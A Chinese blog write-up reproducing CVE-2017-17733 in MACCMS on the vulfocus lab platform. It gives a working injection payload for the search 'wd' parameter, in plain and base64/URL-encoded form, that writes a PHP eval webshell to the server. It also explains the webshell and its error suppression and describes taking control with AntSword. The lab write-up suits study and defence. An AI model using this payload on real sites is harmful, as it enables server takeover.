MACCMS 远程命令执行漏洞复现(CVE-2017-17733)

目录

漏洞介绍

工具使用

环境搭建&复现过程


这是我复现的第一个漏洞(老天奶),有必要做一个详细的writeup。

漏洞介绍

MACCMS是一套采用PHP/MySQL数据库运行的全新且完善的强大视频电影系统。完美支持众多视频网站和高清播放器(youku,tudou,qvod,gvod等),完全免费开源。该漏洞主要的产生原因是CMS搜索页面搜索参数过滤不严导致直接eval执行PHP语句----(一句话木马)。(上面这段概述引自vulfocus哈)


工具使用

火狐浏览器(带有hackbar插件)

中国蚁剑(连接后门)


环境搭建&复现过程

咱们用在线靶场vulfocus(https://vulfocus.cn/)来搭建漏洞环境:

找到maccms远程命令执行漏洞并开启环境,进入到给出的ip:port地址,(每个人每次开启地址都不一样),我这里的是:123.58.224.8:27465

访问该地址:

可以看到我们进入一个看似正常的视频网站,当我们使用搜索功能时候,会发现URL地址栏中会多出一个++++index.php?m=vod-search++++

使用bp抓包会发现我们提交的搜索数据是以wd参数,(我电脑上的bp现在有点小问题不能演示)post方式提交到后台的,那么我们便可以在wd中精心构造一句话木马,上传到目标服务器中,在这里我们使用的是火狐浏览器中的HackBar插件(这个得自行下载)来进行post数据包的提交(当然用bp也是可以的)

该payload为:

wd={if-A:print(fputs(fopen(base64_decode(c.php),w),base64_decode(<?php @eval($_POST[c]); ?>1)))}{endif-A}

该payload大概意为创建一个c.php文件,并写入一句话木马

<?php @eval($_POST[c]); ?>

以及字符"1"

因为目前正在学upload-lab,所以对webshell稍作解释:

<?php?> 就是php标识,有了这个服务器才会把里面的内容当php解析。

@ 作用是,即使后面出现错误也不会报错,否则报错信息被目标主机看到,我们的渗透就失败了。(该错误是$_POST[c]中的变量c没有定义直接使用)

eval 意为把后面的所有内容都当作代码来执行。

$_POST[c] 意为以post方式来接受变量c的值。

并且为了防止过滤,我们将敏感字符转化为base64编码,上传到目标服务器后,再让服务器base64_decode解析加密内容,就可以成功上传webshell,从而控制目标站点。

加密后的密文:(也就是最终在HackBar中输入的数据)

wd={if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}

除一句话木马之外,还有一个字符"1",当我们上传payload并访问c.php文件时,前面的php当作代码执行,剩下1输出到网页中,所以如果我们能看到字符1,那就说明上传成功,接下来用蚁剑连接即可。

打开中国蚁剑(第一次用得初始化)右键添加数据:

输入URL和连接密码c即可控制对方主机

在/tmp目录下找到flag,漏洞复现完成

flag-{bmhd0da328b-51c7-489e-93e9-44aeb0a2cb0a}

欢迎大家批评指正!

相关推荐
网络安全King18 分钟前
华为 网络安全 认证
安全·web安全
世事如云有卷舒41 分钟前
FreeRTOS学习笔记
笔记·学习
网络安全-老纪1 小时前
网络安全-js安全知识点与XSS常用payloads
javascript·安全·web安全
API_technology1 小时前
电商API安全防护:JWT令牌与XSS防御实战
前端·安全·xss
靡不有初1111 小时前
CCF-CSP第18次认证第一题——报数【两个与string相关的函数的使用】
c++·学习·ccfcsp
Tipray20062 小时前
天 锐 蓝盾终端安全管理系统:办公U盘拷贝使用管控限制
安全
gu202 小时前
c#编程:学习Linq,重几个简单示例开始
开发语言·学习·c#·linq
小蒜学长3 小时前
医疗报销系统的设计与实现(代码+数据库+LW)
数据库·spring boot·学习·oracle·课程设计
羊小猪~~3 小时前
MYSQL学习笔记(九):MYSQL表的“增删改查”
数据库·笔记·后端·sql·学习·mysql·考研
余多多_zZ4 小时前
鸿蒙初学者学习手册(HarmonyOSNext_API14)_组件截图(@ohos.arkui.componentSnapshot (组件截图) )
学习·华为·harmonyos·鸿蒙·鸿蒙系统